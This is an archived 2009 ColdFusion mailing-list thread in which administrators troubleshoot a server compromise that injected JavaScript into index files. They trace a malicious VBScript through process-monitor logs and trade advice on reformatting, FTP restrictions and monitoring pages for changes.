Re: Question about hack
well in our case, we already fixed the problem that allowed the person to upload in the first place. i posted it in one of the first posts in this thread. The problem we where having was finding the script that was still getting ran, which we finally found. On Thu, Apr 30, 2009 at 10:53 AM, Dave Watts wrote: > > > We finally fixed our issue. > > After a long crackdown on security on our server, one of our sites (the > one > > that was causing all the fuss) gave me it's name and after about 2 mins > it > > was quite clear what was causing it. > > > > mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 ) > > > > and we already moved the sites that had important info to another > *secure* > > server, so until we get the dns info to all the sites so we can migrate > them > > over to another server, we are going to have to stick with this one for a > > few weeks. > > > > Just figured i'd share the final cause of the problem. > > Well, actually, that's not the final cause of the problem, just to be > clear. The cause was whatever allowed someone to upload the file in > the first place. > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ > > Fig Leaf Software provides the highest caliber vendor-authorized > instruction at our training centers in Washington DC, Atlanta, > Chicago, Baltimore, Northern Virginia, or on-site at your location. > Visit http://training.figleaf.com/ for more information! > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322081 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> We finally fixed our issue. > After a long crackdown on security on our server, one of our sites (the one > that was causing all the fuss) gave me it's name and after about 2 mins it > was quite clear what was causing it. > > mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 ) > > and we already moved the sites that had important info to another *secure* > server, so until we get the dns info to all the sites so we can migrate them > over to another server, we are going to have to stick with this one for a > few weeks. > > Just figured i'd share the final cause of the problem. Well, actually, that's not the final cause of the problem, just to be clear. The cause was whatever allowed someone to upload the file in the first place. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322080 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Nate, Thanks for the post follow up. Very helpful. -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: ALL [mailto:thegreat...@gmail.com] Sent: Thursday, April 30, 2009 10:25 AM To: cf-talk Subject: Re: Question about hack We finally fixed our issue. After a long crackdown on security on our server, one of our sites (the one that was causing all the fuss) gave me it's name and after about 2 mins it was quite clear what was causing it. mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 ) and we already moved the sites that had important info to another *secure* server, so until we get the dns info to all the sites so we can migrate them over to another server, we are going to have to stick with this one for a few weeks. Just figured i'd share the final cause of the problem. -Nathan ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322079 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
We finally fixed our issue. After a long crackdown on security on our server, one of our sites (the one that was causing all the fuss) gave me it's name and after about 2 mins it was quite clear what was causing it. mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 ) and we already moved the sites that had important info to another *secure* server, so until we get the dns info to all the sites so we can migrate them over to another server, we are going to have to stick with this one for a few weeks. Just figured i'd share the final cause of the problem. -Nathan ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322077 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> The issue with formatting is that it will likely come back when we move our > sites back onto the server > From what I am gathering it is actually being ran manually, not on > a scheduled task and likely remotely. > > I "Believe" this is coming from ASP and not coldfusion itself, due to > articles like this Well, it's your job to secure the new server so that this doesn't happen. But the server is compromised right now to a degree that I wouldn't want to guarantee you can fix the problem. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321901 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
The issue with formatting is that it will likely come back when we move our sites back onto the server >From what I am gathering it is actually being ran manually, not on a scheduled task and likely remotely. I "Believe" this is coming from ASP and not coldfusion itself, due to articles like this: http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://q.163.com/lianglimi/blog/hhl...@126/669001092009320624566/&ei=B7bwSfuPDcWFtgfP7YW-Dw&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dcscript%2Bscan.vbe%26hl%3Den%26rlz%3D1C1GGLS_enUS324US324%26sa%3DG (originally in Chinese or something and used google to translate it). On Thu, Apr 23, 2009 at 10:02 AM, Mark Kruger wrote: > > Nate, > > Excellent ...thanks for this. > > -mark > > > > Mark A. Kruger, CFG, MCSE > (402) 408-3733 ext 105 > www.cfwebtools.com > www.coldfusionmuse.com > www.necfug.com > > -Original Message- > From: ALL [mailto:thegreat...@gmail.com] > Sent: Thursday, April 23, 2009 3:34 AM > To: cf-talk > Subject: Re: Question about hack > > > Not sure if any more info on this subject has came up, but here is the > contents of the file gm.vbs that was doing all the dirty work: > http://paste-it.net/public/v22f672/ > > I have also noticed a new file named: > > 1.exe in the c:\ root directory. It has an icon of "BMW" (the car company), > not sure if that has something to do with it either. > > -Nathan > > On Thu, Apr 16, 2009 at 7:56 PM, Al Musella, DPM > wrote: > > > > > A few ideas: > > 1. Set the ftp security to only allow connections from specific IP > > addresses. If the user has a dynamic ip, then use his entire range.. > > better than letting the entire world in 2. Your blog shows why I said > > to Michael to reformat the drive and reinstall everything when he was > > attacked. Once you let someone else get access to your server, there > > is no way you can ever trust it again. It has to be reformatted. > > 3. I know it isn't the right way to fight an attack, but for this > > specific attack, just put your index.cfm file into a different file, > > then have your index.cfm file just do a cflocation to that page. If > > the hack adds stuff to the index.cfm page, nothing will happen to the > > users. > > > > > > At 03:31 PM 4/16/2009, you wrote: > > > > >For those interested I have compiled all I know about this attack > > >into a blog post: > > > > > >http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.ha > > >ck > > > > > >Again, we have not specifically identified the attack but we have > > >lots of information and a stop gap measure :) > > > > > >-Mark > > > > > > > > >Mark A. Kruger, CFG, MCSE > > >(402) 408-3733 ext 105 > > >www.cfwebtools.com > > >www.coldfusionmuse.com > > >www.necfug.com > > > > > >-Original Message- > > >From: Mark Kruger [mailto:mkru...@cfwebtools.com] > > >Sent: Tuesday, April 14, 2009 5:37 PM > > >To: cf-talk > > >Subject: RE: Question about hack > > > > > > > > >Thanks... I'll add that to my list. > > > > > >I have a pretty hefty blog post coming out on this tomorrow (or > > >hopefully tomorrow :). > > > > > >-mark > > > > > > > > > > > > > > > > > > > > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321898 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Nate, Excellent ...thanks for this. -mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: ALL [mailto:thegreat...@gmail.com] Sent: Thursday, April 23, 2009 3:34 AM To: cf-talk Subject: Re: Question about hack Not sure if any more info on this subject has came up, but here is the contents of the file gm.vbs that was doing all the dirty work: http://paste-it.net/public/v22f672/ I have also noticed a new file named: 1.exe in the c:\ root directory. It has an icon of "BMW" (the car company), not sure if that has something to do with it either. -Nathan On Thu, Apr 16, 2009 at 7:56 PM, Al Musella, DPM wrote: > > A few ideas: > 1. Set the ftp security to only allow connections from specific IP > addresses. If the user has a dynamic ip, then use his entire range.. > better than letting the entire world in 2. Your blog shows why I said > to Michael to reformat the drive and reinstall everything when he was > attacked. Once you let someone else get access to your server, there > is no way you can ever trust it again. It has to be reformatted. > 3. I know it isn't the right way to fight an attack, but for this > specific attack, just put your index.cfm file into a different file, > then have your index.cfm file just do a cflocation to that page. If > the hack adds stuff to the index.cfm page, nothing will happen to the > users. > > > At 03:31 PM 4/16/2009, you wrote: > > >For those interested I have compiled all I know about this attack > >into a blog post: > > > >http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.ha > >ck > > > >Again, we have not specifically identified the attack but we have > >lots of information and a stop gap measure :) > > > >-Mark > > > > > >Mark A. Kruger, CFG, MCSE > >(402) 408-3733 ext 105 > >www.cfwebtools.com > >www.coldfusionmuse.com > >www.necfug.com > > > >-Original Message- > >From: Mark Kruger [mailto:mkru...@cfwebtools.com] > >Sent: Tuesday, April 14, 2009 5:37 PM > >To: cf-talk > >Subject: RE: Question about hack > > > > > >Thanks... I'll add that to my list. > > > >I have a pretty hefty blog post coming out on this tomorrow (or > >hopefully tomorrow :). > > > >-mark > > > > > > > > > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321873 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
> I strongly recommend that you reformat the disk and reinstall. The Much nodding here too ! If you can afford too, and it contains any sort of sensitive data, you really need to take this opportunity to buy all new hardware - anything could be running (in the BIOS, in the hypervisor, ...) -- Helping to biannually extend infrastructures as part of the IT team of the year, '09 and '08 Tom Chiverton Developer Tel: +44 0161 618 5032 Fax: +44 0161 618 5099 tom.chiver...@halliwells.com 3 Hardman Square, Manchester, M3 3EB www.Halliwells.com This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office together with a list of those non members who are referred to as partners. We use the word partner to refer to a member of the LLP, or an employee or consultant with equivalent standing and qualifications. Regulated by the Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.Halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321850 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
Some further instructions in this instuctional vid: http://www.youtube.com/watch?v=k-GaRKDsz-Y mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/ 2009/4/23 Dave Watts : > >> Not sure if any more info on this subject has came up, but here is the >> contents of the file gm.vbs that was doing all the dirty work: >> http://paste-it.net/public/v22f672/ >> >> I have also noticed a new file named: >> >> 1.exe in the c:\ root directory. It has an icon of "BMW" (the car company), >> not sure if that has something to do with it either. > > I strongly recommend that you reformat the disk and reinstall. The > machine has been compromised, and you really can't make it trustable > again. If it's just a CF server, copy the CF files, export your CF > settings, and after you reinstall Windows and CF you should be able to > restore functionality pretty quickly. > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321849 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
> Not sure if any more info on this subject has came up, but here is the > contents of the file gm.vbs that was doing all the dirty work: > http://paste-it.net/public/v22f672/ > > I have also noticed a new file named: > > 1.exe in the c:\ root directory. It has an icon of "BMW" (the car company), > not sure if that has something to do with it either. I strongly recommend that you reformat the disk and reinstall. The machine has been compromised, and you really can't make it trustable again. If it's just a CF server, copy the CF files, export your CF settings, and after you reinstall Windows and CF you should be able to restore functionality pretty quickly. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321848 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Question about hack
Not sure if any more info on this subject has came up, but here is the contents of the file gm.vbs that was doing all the dirty work: http://paste-it.net/public/v22f672/ I have also noticed a new file named: 1.exe in the c:\ root directory. It has an icon of "BMW" (the car company), not sure if that has something to do with it either. -Nathan On Thu, Apr 16, 2009 at 7:56 PM, Al Musella, DPM wrote: > > A few ideas: > 1. Set the ftp security to only allow > connections from specific IP addresses. If the > user has a dynamic ip, then use his entire > range.. better than letting the entire world in > 2. Your blog shows why I said to Michael to > reformat the drive and reinstall everything when > he was attacked. Once you let someone else get > access to your server, there is no way you can > ever trust it again. It has to be reformatted. > 3. I know it isn't the right way to fight an > attack, but for this specific attack, just > put your index.cfm file into a different file, > then have your index.cfm file just do a > cflocation to that page. If the hack adds stuff > to the index.cfm page, nothing will happen to the users. > > > At 03:31 PM 4/16/2009, you wrote: > > >For those interested I have compiled all I know about this attack into a > >blog post: > > > >http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack > > > >Again, we have not specifically identified the attack but we have lots of > >information and a stop gap measure :) > > > >-Mark > > > > > >Mark A. Kruger, CFG, MCSE > >(402) 408-3733 ext 105 > >www.cfwebtools.com > >www.coldfusionmuse.com > >www.necfug.com > > > >-Original Message- > >From: Mark Kruger [mailto:mkru...@cfwebtools.com] > >Sent: Tuesday, April 14, 2009 5:37 PM > >To: cf-talk > >Subject: RE: Question about hack > > > > > >Thanks... I'll add that to my list. > > > >I have a pretty hefty blog post coming out on this tomorrow (or hopefully > >tomorrow :). > > > >-mark > > > > > > > > > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321844 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Question about hack
A few ideas: 1. Set the ftp security to only allow connections from specific IP addresses. If the user has a dynamic ip, then use his entire range.. better than letting the entire world in 2. Your blog shows why I said to Michael to reformat the drive and reinstall everything when he was attacked. Once you let someone else get access to your server, there is no way you can ever trust it again. It has to be reformatted. 3. I know it isn't the right way to fight an attack, but for this specific attack, just put your index.cfm file into a different file, then have your index.cfm file just do a cflocation to that page. If the hack adds stuff to the index.cfm page, nothing will happen to the users. At 03:31 PM 4/16/2009, you wrote: >For those interested I have compiled all I know about this attack into a >blog post: > >http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack > >Again, we have not specifically identified the attack but we have lots of >information and a stop gap measure :) > >-Mark > > >Mark A. Kruger, CFG, MCSE >(402) 408-3733 ext 105 >www.cfwebtools.com >www.coldfusionmuse.com >www.necfug.com > >-Original Message- >From: Mark Kruger [mailto:mkru...@cfwebtools.com] >Sent: Tuesday, April 14, 2009 5:37 PM >To: cf-talk >Subject: RE: Question about hack > > >Thanks... I'll add that to my list. > >I have a pretty hefty blog post coming out on this tomorrow (or hopefully >tomorrow :). > >-mark > > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321715 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Question about hack
Aweome Nate... I'm going to add this as an adendum to my post... Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: ALL [mailto:thegreat...@gmail.com] Sent: Thursday, April 16, 2009 3:06 PM To: cf-talk Subject: Re: Question about hack Hey Thanks Mark, I learnt a bit more about it from reading your article and found more info on it last night when (as you stated) 9:00 rolled around... I have been running a process monitor program that tracks file changes to see what process/program is actually changing the files, and it was coming from cscript.exe which is the executer to execute *.vbs scripts and other "visual" languages. The executing script was "c:/gm.vbs" but the script did not exist when I went looking for it So, my thoughts on it are this is just the part doing the dirty work, and there is an actual executable or service somewhere that is making the file and executing it. Here is the info my process monitor spit out about the cscript.exe file that was doing the dirty work: Path: "C:\WINDOWS\system32\cscript.exe" Command Line: "cscript c:\gm.vbs d:\inetpub" User: "NT AUTHORITY\SYSTEM" Started: "4/15/2009 8:57:58 PM" Ended: "4/15/2009 9:01:11 PM" Architecture: 32-bit I hope this may help anyone else working on this issue, I believe I am extremely close to solving it and just need it to run once more, because this time I have the process monitor tracking almost everything. -Nathan Bruer On Thu, Apr 16, 2009 at 1:31 PM, Mark Kruger wrote: > > For those interested I have compiled all I know about this attack into > a blog post: > > http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hac > k > > Again, we have not specifically identified the attack but we have lots > of information and a stop gap measure :) > > -Mark > > > Mark A. Kruger, CFG, MCSE > (402) 408-3733 ext 105 > www.cfwebtools.com > www.coldfusionmuse.com > www.necfug.com > > -Original Message- > From: Mark Kruger [mailto:mkru...@cfwebtools.com] > Sent: Tuesday, April 14, 2009 5:37 PM > To: cf-talk > Subject: RE: Question about hack > > > Thanks... I'll add that to my list. > > I have a pretty hefty blog post coming out on this tomorrow (or > hopefully tomorrow :). > > -mark > > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321708 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
Hey Thanks Mark, I learnt a bit more about it from reading your article and found more info on it last night when (as you stated) 9:00 rolled around... I have been running a process monitor program that tracks file changes to see what process/program is actually changing the files, and it was coming from cscript.exe which is the executer to execute *.vbs scripts and other "visual" languages. The executing script was "c:/gm.vbs" but the script did not exist when I went looking for it So, my thoughts on it are this is just the part doing the dirty work, and there is an actual executable or service somewhere that is making the file and executing it. Here is the info my process monitor spit out about the cscript.exe file that was doing the dirty work: Path: "C:\WINDOWS\system32\cscript.exe" Command Line: "cscript c:\gm.vbs d:\inetpub" User: "NT AUTHORITY\SYSTEM" Started: "4/15/2009 8:57:58 PM" Ended: "4/15/2009 9:01:11 PM" Architecture: 32-bit I hope this may help anyone else working on this issue, I believe I am extremely close to solving it and just need it to run once more, because this time I have the process monitor tracking almost everything. -Nathan Bruer On Thu, Apr 16, 2009 at 1:31 PM, Mark Kruger wrote: > > For those interested I have compiled all I know about this attack into a > blog post: > > http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack > > Again, we have not specifically identified the attack but we have lots of > information and a stop gap measure :) > > -Mark > > > Mark A. Kruger, CFG, MCSE > (402) 408-3733 ext 105 > www.cfwebtools.com > www.coldfusionmuse.com > www.necfug.com > > -Original Message- > From: Mark Kruger [mailto:mkru...@cfwebtools.com] > Sent: Tuesday, April 14, 2009 5:37 PM > To: cf-talk > Subject: RE: Question about hack > > > Thanks... I'll add that to my list. > > I have a pretty hefty blog post coming out on this tomorrow (or hopefully > tomorrow :). > > -mark > > > > > ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321703 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
For those interested I have compiled all I know about this attack into a blog post: http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack Again, we have not specifically identified the attack but we have lots of information and a stop gap measure :) -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Mark Kruger [mailto:mkru...@cfwebtools.com] Sent: Tuesday, April 14, 2009 5:37 PM To: cf-talk Subject: RE: Question about hack Thanks... I'll add that to my list. I have a pretty hefty blog post coming out on this tomorrow (or hopefully tomorrow :). -mark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321695 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
thanks for the info, at least we know what to look for now. we will also try to setup something similar, thanks again >No - if you are hacked, the home page is available, but it includes a >javascript that does bad things to the visitors. >The most common way is a sql injection attack, where they insert the >javascript into some fields in the database, (in my case, they >appended the javascript to all vchar fields in every table) so when >you display information on the website from the database, you >inadvertently are also adding that javascript to the page. > The recent attack that is being talked about has the attacker >editing the index.cfm page and directly adding javascript to it. > >In both types of attacks, the home page is available and you might >not notice anything just by looking at it. >So my idea to detect it is to set up a cfhttp call to the index.cfm page. >I add a url parameter that signifies that the page should also >display my own personal information from one of the tables. I do this >because I know I won't change the information in the table, and if it >does change, there was a problem. > >So the first time I do the cfhttp call, I save the page, then all >subsequent calls get compared to it. If it changes, or is not >available, I send an alert to my cell phone. >I do this as an automated task from a different server so I can test >if the website is up also. > >One problem I had was my banner ad changes.. so I put a comment >around the banner ad that says "start banner" "end banner", and snip >that section out before comparing it. > > > > > > >At 12:34 PM 4/14/2009, you wrote: ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321602 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
No - if you are hacked, the home page is available, but it includes a javascript that does bad things to the visitors. The most common way is a sql injection attack, where they insert the javascript into some fields in the database, (in my case, they appended the javascript to all vchar fields in every table) so when you display information on the website from the database, you inadvertently are also adding that javascript to the page. The recent attack that is being talked about has the attacker editing the index.cfm page and directly adding javascript to it. In both types of attacks, the home page is available and you might not notice anything just by looking at it. So my idea to detect it is to set up a cfhttp call to the index.cfm page. I add a url parameter that signifies that the page should also display my own personal information from one of the tables. I do this because I know I won't change the information in the table, and if it does change, there was a problem. So the first time I do the cfhttp call, I save the page, then all subsequent calls get compared to it. If it changes, or is not available, I send an alert to my cell phone. I do this as an automated task from a different server so I can test if the website is up also. One problem I had was my banner ad changes.. so I put a comment around the banner ad that says "start banner" "end banner", and snip that section out before comparing it. At 12:34 PM 4/14/2009, you wrote: >this sounds like a good idea. when a hack is taking place would the >home page not be available? is this because they are running >multiple scripts which takes all the resources? > >can you explain this a little more as i feel like it is a good idea, >and would like to understand how to implement it > >thanks > > > > >To test if I have been hacked: I run an automated task from my > >home computer that requests my home page every 15 minutes. I use a > >URL variable that tells my home page to display a footer (which only > >appears when this particular url variable is present) which shows my > >name, address, phone, email address and a few other fields taken from > >my "members" table. I then compare what is displayed to what I know > >belongs there. (The only part that changes is the banner ad, which I > >ignore) IF the page isn't available, or if any of the text > >changes, I send an alert to my cell phone. When I was hacked last > >year, every table in my database had a javascrpt inserted into it. > >This will alert me if that happen again. I do this for my 3 most > >important web sites. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321601 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Question about hack
Thanks... I'll add that to my list. I have a pretty hefty blog post coming out on this tomorrow (or hopefully tomorrow :). -mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Gerald Guido [mailto:gerald.gu...@gmail.com] Sent: Tuesday, April 14, 2009 4:08 PM To: cf-talk Subject: Re: Question about hack Mark, I can confirm that there has been FTP related 'sploits going around. I received a message from a hosting company warning that: "There is a potential security exploit within the FTP software that we use on your account." Just a 411 G! On Mon, Apr 13, 2009 at 1:13 PM, Mark Kruger wrote: > > Donnie, > > I believe this is the same attack I have been helping another customer > with and it does not appear to be related to CF. Instead, it appears > to start with a malware install of some kind on the server (and > possibly a root kit) and then progress to the creation of accounts and > the changing of file permissions. Another theory gaining weight (and > illustrating that we don't know much yet) is that this attack is an > agent on a client computer that piggybacks onto FTP - which explains a > few things but not everything. I'm guessing some combination at this point. > > Anyway, I agree that cfexecute is a dangerous tag that needs to be > controlled, but it does not appear to be the cuprit. All of this > advice is good, but the only place that CF comes into play on this > particular hack happens to be the propensity to use "index.cfm" as the home page script. > The > attack targets "index.*" files and affects (on the server I am working > with) > Index.cfm, index.html and index.php etc. > > -Mark > > > > Mark A. Kruger, CFG, MCSE > (402) 408-3733 ext 105 > www.cfwebtools.com > www.coldfusionmuse.com > www.necfug.com > > -Original Message- > From: Donnie Bachan (Gmail) [mailto:donnie.bac...@gmail.com] > Sent: Monday, April 13, 2009 8:30 AM > To: cf-talk > Subject: Re: Question about hack > > > Hi Nick, > > I know this post is a bit late but to your original question, that > attack is as a result of incorrect file/iis permissions and is not an > XSS attack. I would even bet that you are on a shared server (at HMS) > since one of my client sites had this exact same problem. The attacker > would have gained access to the file system (possibly via FTP) and > executed code that injected the code into all index.* files on the > server (not just your hosting account). We have had a lot of problems > trying to get this sorted out. It appears that the issue was with > security related to the windows script host and/or CFEXECUTE. The only > thing you can do to prevent this is work with your hosting provider to > secure the system or move to a VPS or dedicated account and make sure > your FTP accounts are secure. > > HTH > > Donnie Bachan > "Nitendo Vinces - By Striving You Shall Conquer" > == > The information transmitted is intended only for the person or entity > to which it is addressed and may contain confidential and/or > privileged material. Any review, retransmission, dissemination or > other use of, or taking of any action in reliance upon, this > information by persons or entities other than the intended recipient > is prohibited. If you received this in error, please contact the > sender and delete the material from any computer. > > > > On Mon, Apr 13, 2009 at 1:30 PM, Richard White wrote: > > > > hi dave, i have scripts that write to the file system as well. what > > would i need to do to secure them, do you have a link that i could > > read in relation to this as i am a little lost as to what to do > > > > thanks > > > >> > We are having to scrub our files to remove the injected code > >> > (which > >> is being written directly > >> > to the files as the result of the hack allowing "FULL CONTROL" > >> > for > >> the Everyone user on the > >> > machine. > >> > > >> > Have you determined a solution for removing/preventing this? > >> > >> First, audit your code to find any scripts that can write to the > >> filesystem. > >> Second, audit your code to find any scripts that pass unfiltered > >> user input to the database. > >> Third, fix that code. > >> Fourth, configure filesystem permissions properly to prevent CF or > >> your database from writing to the web server's webroot. > >> >
Re: Question about hack
